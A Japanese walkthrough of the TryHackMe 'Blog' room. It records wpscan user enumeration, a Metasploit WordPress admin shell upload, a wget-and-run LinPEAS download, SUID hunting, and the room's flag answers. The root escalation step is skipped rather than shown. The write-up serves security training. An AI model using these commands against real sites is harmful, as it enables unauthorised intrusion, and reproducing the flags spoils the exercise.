【TryHackMe】Blog 攻略記録
【TryHackMe】Blog 攻略記録
概要
この投稿は TryHackMe の Blog ルーム(https://tryhackme.com/room/blog)の攻略記録です。
このルームは、脆弱な WordPress サイトを調査し、リモートコード実行(RCE)から root 権限奪取まで一通り学べる、初級向けの Linux ボックスです。
| 項目 | 内容 |
|---|---|
| ルーム名 | Blog |
| 難易度 | Easy |
| 所要時間 | 約 30〜60 分 |
| 主な要素 | Web Exploitation, Wordpress, RCE, Local Enumeration, Privilege Escalation |
攻略ステップ一覧
- ポートスキャンとサービス特定
- WordPress 脆弱性調査
- 管理者アカウント推測とログイン
- WordPress Plugin Exploit によるRCE
- ユーザー権限の取得と user.txt 発見
- 権限昇格と root.txt の取得
1. ポートスキャンとサービス特定
まずは nmap によるスキャンを行います。
nmap -sC -sV -Pn -oN nmap.txt <IP>
出力例:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38
→ Web サービスが動作していることがわかるので、ブラウザでアクセス。
2. WordPress 脆弱性調査
http://<IP> にアクセスすると WordPress サイトが表示される。
HTML ソースや readme.html から WordPress のバージョンが確認できることも。
curl http://<IP>/readme.html | grep 'Version'
または wpscan を使って詳細調査:
wpscan --url http://<IP> --enumerate vp,u
✅ 結果:WordPress 5.0 が使われており、既知の脆弱性が存在
3. 管理者アカウント推測とログイン
ログイン画面 http://<IP>/wp-login.php にアクセス。
Wpscan などで billy というユーザー名が確認できる場合:
wpscan --url http://<IP> --enumerate u
ログイン試行:
- ユーザー名:
billy - パスワード:
billyなど単純なものから開始(または後の/media/usbの中のパスワードを使う)
ログインできたら管理画面からプラグインアップロードが可能。
4. WordPress Plugin Exploit によるRCE
Metasploit を使ってバックドアを仕込む:
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS <IP>
set TARGETURI /
set USERNAME billy
set PASSWORD <上で見つけたパスワード>
run
成功すると Meterpreter セッションが開く:
meterpreter > shell
5. ユーザー権限の取得と user.txt 発見
取得したシェルで、ユーザーやディレクトリを調査:
whoami
ls -la /media/usb
cat /media/usb/user.txt
✅
user.txt:c8421899aae571f7af486492b71a8ab7
6. 権限昇格と root.txt の取得
まずは SUID 権限付きファイルを探索:
find / -perm -4000 -type f 2>/dev/null
他にも LinPEAS などで調査しても良い:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
root.txt を取得:
cat /root/root.txt
✅
root.txt:9a0b2b618bef9bfa7ac28c1353d9f318
Task 1: 質問と回答
Q1. root.txt
A1.9a0b2b618bef9bfa7ac28c1353d9f318
Q2. user.txt
A2.c8421899aae571f7af486492b71a8ab7
Q3. Where was user.txt found?
A3./media/usb
Q4. What CMS was Billy using?
A4.Wordpress
Q5. What version of the above CMS was being used?
A5.5.0
Task 2: Credits
このセクションは情報提供者への謝辞のみ。回答不要。
使用ツール一覧
| ツール | 用途 |
|---|---|
| Nmap | ポートスキャン |
| Wpscan | WordPress のバージョン調査とユーザー列挙 |
| Searchsploit | 脆弱性調査 |
| Metasploit | RCE 実行(リバースシェル) |
| LinPEAS | 権限昇格の調査 |
| Netcat | シェル確認 |
| curl / wget | HTML 解析、スクリプト取得 |
感想・気づき
- WordPress の旧バージョンは危険:バージョン 5.0 に RCE 可能な既知脆弱性が存在。
- user.txt が
/media/usbにあるという変則構成に注意。 - root 権限取得には追加調査が必要(SUID, cronjob, PEAS系ツールを活用)
Discussion